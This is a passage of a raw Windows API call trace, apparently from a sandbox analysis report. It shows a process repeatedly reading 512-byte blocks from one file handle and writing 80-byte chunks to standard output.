(_FileHandle=1) returned 0x50 [0152.524] GetFileType (hFile=0x50) returned 0x1 [0152.524] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.524] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.524] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.524] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.524] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.525] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.525] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.526] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.526] ReadFile 
(in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] GetFileType (hFile=0x50) returned 0x1 [0152.526] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.526] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.527] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.527] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.527] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.527] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, 
lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] GetFileType (hFile=0x50) returned 0x1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.528] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, 
lpOverlapped=0x0) returned 1 [0152.528] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.529] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.529] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] WriteFile (in: hFile=0x50, 
lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.529] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.529] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.530] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.530] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0152.530] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] GetFileType (hFile=0x50) returned 0x1 [0152.530] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.530] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] 
GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.531] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.531] GetFileType (hFile=0x50) returned 0x1 [0152.532] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.532] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.532] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.532] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.532] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.532] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.532] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.532] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | 
out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] GetFileType (hFile=0x50) returned 0x1 [0152.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.533] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, 
lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.534] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.534] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] WriteFile (in: hFile=0x50, lpBuffer=0x1aeed4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aeed4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.534] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.534] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 
[0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1aef24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef24*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1aef74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aef74*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1aefc4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aefc4*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1af014*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af014*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] GetFileType (hFile=0x50) returned 0x1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.535] WriteFile (in: hFile=0x50, lpBuffer=0x1af064*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1af064*, lpNumberOfBytesWritten=0x1ae068*=0x20, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.535] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae054 | out: lpNewFilePointer=0x0) 
returned 1 [0152.535] _get_osfhandle (_FileHandle=4) returned 0x58 [0152.535] ReadFile (in: hFile=0x58, lpBuffer=0x1aee84, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae074, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesRead=0x1ae074*=0x200, lpOverlapped=0x0) returned 1 [0152.535] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] GetFileType (hFile=0x50) returned 0x1 [0152.536] _get_osfhandle (_FileHandle=1) returned 0x50 [0152.536] WriteFile (in: hFile=0x50, lpBuffer=0x1aee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae068, lpOverlapped=0x0 | out: lpBuffer=0x1aee84*, lpNumberOfBytesWritten=0x1ae068*=0x50, lpOverlapped=0x0) returned 1 [0152.536] 